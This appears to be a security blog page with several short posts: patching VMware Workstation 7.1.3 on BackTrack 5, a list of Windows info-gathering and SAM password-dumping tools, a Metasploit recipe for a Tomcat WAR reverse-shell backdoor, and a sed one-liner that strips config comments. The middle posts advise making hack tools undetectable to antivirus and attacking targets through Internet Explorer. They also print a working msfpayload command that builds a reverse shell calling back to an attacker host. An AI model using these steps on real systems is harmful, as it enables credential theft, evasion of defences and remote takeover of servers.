So I want to install VMware Workstation 7.1.3 on Backtrack 5 (x86_64), but there are some things to do there’re errors after I ran the binary (e.g: ./VMware-Workstation-Full-7.1.3-324285.x86_64.bundle), so here’s the solution:

Prepare the Kernel
Look here: http://www.backtrack-linux.org/forums/backtrack-5-how-tos/40276-backtrack-5-how-prepare-kernel-sources-vmare-tools-drivers-etc.html

Download patch
http://communities.vmware.com/servlet/JiveServlet/download/2344-293321-1721368-58749/vmware-7.1.3-2.6.38-1-generic.patch

Patching
cd /usr/lib/vmware/modules/source
ls *.tar | xargs -n 1 tar xvf
patch -p1 < /path/to/patch/vmware-7.1.3-2.6.38-1-generic.patch
tar cf vmci.tar vmci-only
tar cf vsock.tar vsock-only
tar cf vmnet.tar vmnet-only
tar cf vmmon.tar vmmon-only
rm -rf vmci-only vsock-only vmnet-only vmmon-only

Compile Module
vmware-modconfig --console --install-all
Voila! VMware Workstation 7.1.3 installed, and you can proceed to upgrade to the latest version. This patch applied only for VMware Workstation 7.1.3, for VMware Workstation 7.1.4 download this patch and you can do the same way.

When you were asked to collect all Windows system information such as list of users, services, software installed and its version, Windows update history, etc..probably you wanted to see these tools:

System Information Collector

WinUpdatesList v1.31
WinAudit Freeware v2.28.2

SAM/Password Extractor

pwdump7* ( v7.1 ) (detected as HackTool/Possible Unwanted Application)
FGDump* (detected as HackTool/Possible Unwanted Application)
Offline NT Password & Registry Editor by Petter Nordahl-Hagen (must be done in offline mode/reboot the system)

If you familiar with reverse engineering, make those HackTool/PUA undetectable is the best choice

or

Using Metasploit and attack your target system.  Meterpreter payload contains lot of user scripts that can be useful to dig system info. I suggest the attack against Internet Explorer since it may not harm the system/service running.

J. Dravet wrote various techniques in order to retrieve the passwords, and of course it depends on your goal, use it wisely.

Good luck

Facing a tomcat server.. and need to upload a WAR backdoor…??, well… we can create a WAR backdoor very easily with Metasploit, ok follow this steps:

1. Creating the backdoor.

dudul@banget:~$ msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.96.1 W > dudul.war
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {“LHOST”=>”172.16.96.1″}

Read More >>

Sometimes when you want to config something, it contains the comments from the developer which will help us to figured out which options of arguments will be used. But if you are already familiar with the configuration, comments are so annoying, so here is how to eliminate them (using apache2.conf as example):

sed '1p; /^[[:blank:]]*#/d; s/[[:blank:]][[:blank:]]*#.*//' \
/etc/apache2/apache2.conf | more

or write it to a file:

sed '1p; /^[[:blank:]]*#/d; s/[[:blank:]][[:blank:]]*#.*//' \
/etc/apache2/apache2.conf > /etc/apache2/apache2.conf.nocomments

Use it with caution, always review it before use it. You’ve been warned!